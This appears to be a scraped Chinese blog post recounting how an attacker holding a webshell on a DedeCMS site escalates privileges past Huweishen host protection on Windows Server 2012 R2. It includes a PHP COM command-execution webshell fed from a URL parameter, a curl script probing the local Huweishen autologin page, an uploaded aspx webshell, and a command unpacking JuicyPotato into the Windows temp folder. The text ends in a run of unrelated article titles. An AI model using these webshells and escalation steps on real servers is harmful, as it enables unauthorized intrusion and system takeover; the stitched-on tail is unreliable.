一个dede的站shell,看了下 disable_functions

exec,system,passthru,popen,pclose,shell_exec,proc_open,dl,chmod,escapeshellarg,escapeshellcmd,sh2_exec,proc_terminate,proc_close

而且也不支持pcntl_exec函数,MySQL低权限用户,尝试COM组件<?php

$command=$_GET['a'];

$wsh = new COM('Shell.Application'); //WScript.Shell

$exec = $wsh->exec("cmd /c ".$command);

$stdout = $exec->StdOut();

$stroutput = $stdout->ReadAll();

echo $stroutput;

?>

无回显,COM组件的WScript.Shell、Shell.Application也不支持,这条路无路可走。

只能另辟蹊径 。

通过路径名称发现是护卫神,并确定6588端口是护卫神999端口是phpmyadmin 对root试了几个弱口令也没戏<?php

function httpGet() {

$url = 'http://127.0.0.1:6588/admin/index.asp?f=autologin';

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_HEADER, TRUE); //表示需要response header

curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body

curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);

curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);

curl_setopt($ch, CURLOPT_TIMEOUT, 120);

$result = curl_exec($ch);

return $result;

}

echo httpGet();

?>

把以上代码保存为2.php放网站上运行得到Cookie

当看到有Cookie返回的时候激动的不行,赶紧拿去试试。

但是无果,成功的话响应码是302,而这是返回200,失败。

然后又回到起点,忽然一想护卫神是asp页面,传了个直接asp、aspx和jsp探测一下,发现支持asp和aspx,果断上传aspx马儿。

能够执行命令,感觉成功了一半!win2012R2

但是发现一个难点

只有一个C盘,而且回收站,temp之类的文件夹全部不可读且不可写!

头大的我直接在网站根目录上传了烂土豆

不能够回显

直接这样说明网站目录下没有程序执行权限。(各种后缀名试过了)

就这样陷入僵局,在仅有的可读目录下一个一个的翻找

看到了WinRAR,忽然想到一个法子能不能在shell下直接把exp解压到temp目录呢说干就干。

发现unrar.exe可以执行!

把烂土豆打包成rar上传到网站目录

然后shell执行/c "C:\Program Files\WinRAR\unrar.exe" e C:\HwsHostMaster\xxx\JuicyPotato.rar C:\Windows\Temp\

Bingo~执行解压成功!直接在shell运行下是不是存在且可执行!

护卫神mysql提权_【转载】提权纪实-突破护卫神目录权限相关推荐

  1. 护卫神mysql初始密码_护卫神MySQL密码重置器(MySQL密码重置工具)V1.3 最新免费版...

    护卫神MySQL密码重置器(MySQL密码重置工具)是专门针对MySQL数据库最新开发的密码修改软件.mysql数据库忘记密码时如何修改?护卫神MySQL密码重置器(MySQL密码重置工具)轻松帮助用 ...

  2. api postmain 鉴权_认证鉴权与API权限控制在微服务架构中的设计与实现(一)

    引言: 本文系<认证鉴权与API权限控制在微服务架构中的设计与实现>系列的第一篇,本系列预计四篇文章讲解微服务下的认证鉴权与API权限控制的实现. 1. 背景 最近在做权限相关服务的开发, ...

  3. 护卫神mysql无法启动_护卫神·故障应急排查

    适合环境:windows平台 通过护卫神工程师专业的排查,解决常见的服务器各种故障问题,网站无法访问,服务器或云主机资源占用异常,网站打开异常慢,各种入侵出现的问题,网站访问出现500错误无法打开等. ...

  4. 护卫神mysql域名连接_护卫神·主机大师WEB管理端绑定自己的域名_护卫神

    护卫神·主机大师面板上的网站管理WEB端地址默认为http://服务器IP:6588/admin.为了方便管理,可以绑定指定的域名,通过以下两种方法修改. 第一种方法: 在服务器上打开"护卫 ...

  5. mysql绕过防火墙_[转载]使用sqlmap 绕过防火墙进行注入测试

    0x00 前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过, ...

  6. mysql的检查点_转载一篇关于mysql检查点的文章

    数据库运行一段时间后,经常导致服务器大量的swap,我怀疑是innodb中的脏数据太多了,因为没有free space了,mysql通知OS,把一些脏页交换出去,以上只是猜测.有一个现象是每次关数据库 ...

  7. linux mysql清除缓存_转载-清除Linux中MySQL的使用痕迹~/.mysql_history

    背景:我们在管理MySQL server的时候,常常使用mysql命令行工具连接MySQL server进行操作,此时我们可以像shell命令行一样,按向上的方向键, mysql会给出我们最近执行的S ...

  8. mysql 锁设置密码_[转载]mysql锁小结

    Record Lock 总是会去锁住索引记录,如果innodb存储引擎表在建立的时候没有设置任何一个索引,而且查询的时候没有使用到索引,那么这时就会导致表锁. Next-Key Lock是结合了Gap ...

  9. php mysql安装配置_转载:PHP,MySQL的安装与配置

    一.安装配置PHP 把php.ini-production另存为php.ini.修改其内容: 1)extension_dir = "D:/php-5.4.45/ext"设置指定的扩 ...

最新文章

  1. popWindow 出现点击上下空白区域消失点击左右空白区域不消失弹框的处理方法
  2. 【HTML】兴唐二十八节课之常用标签(不定期更新)
  3. Vue实现在前端导出Excel
  4. 下一个游戏新风口已来?小游戏或成2018年最大游戏黑马
  5. 好用的平板电脑_支架里的变形金刚让手机、电脑、平板更好用!6种角度,1秒切换...
  6. 手把手教你用FineBI,快速搭建可视化驾驶舱
  7. Adonis结果P值小于0.05,一定代表两组样品物种构成差异显著吗?
  8. 黑马程序员php考试题,PHP基础案例教程
  9. Audio bringup I2C调试(三十一)
  10. java认证考试题库看不懂_一道JAVA认证考试试题,有点想不通,各位看看...
  11. C#和VB.net代码转换工具
  12. NXP JN5169 电源管理和睡眠模式
  13. Java美颜相机(1)图像处理
  14. Windows10去除桌面快捷方式小箭头
  15. failed to req API:/nacos/v1/ns/instance after all servers([192.168.43.148:8848]) tried: ErrCode:503,
  16. 计算机访问固态硬盘时间,电脑SSD固态硬盘快要坏掉的5种征兆
  17. 如果你画了一个圆被挤扁了
  18. (二)ROS中控制机器人运动(示例运行)
  19. ROS学习笔记3_发布者Publisher
  20. 你有什么道理后悔没早点知道

热门文章

  1. Citrix XenApp和XenDesktop 打印系统解析②
  2. 北大青鸟第二阶段课程进度
  3. 美智医疗java_美智医疗医院信息一体化集成平台
  4. 高中毕业会考计算机试题,高中计算机会考试题及答案2
  5. php-fpm 如果dm设置为 static,那么其实只有pm.max_children这个参数生效。系统会开启设置数量的php-fpm进程。...
  6. python实现jpg、png等图片格式转为PDF
  7. 华硕TUF B360M PLUS GAMING主板+9400F+迪兰 RX590 8GB V2显卡 EFI
  8. WiFi连上了,却上不了网,请看这里
  9. 达拉崩吧的酒宴 | 感受算法的魅力
  10. 老男孩python全栈开发视频教程_老男孩Python全栈开发(92天全)视频教程 自学笔记06...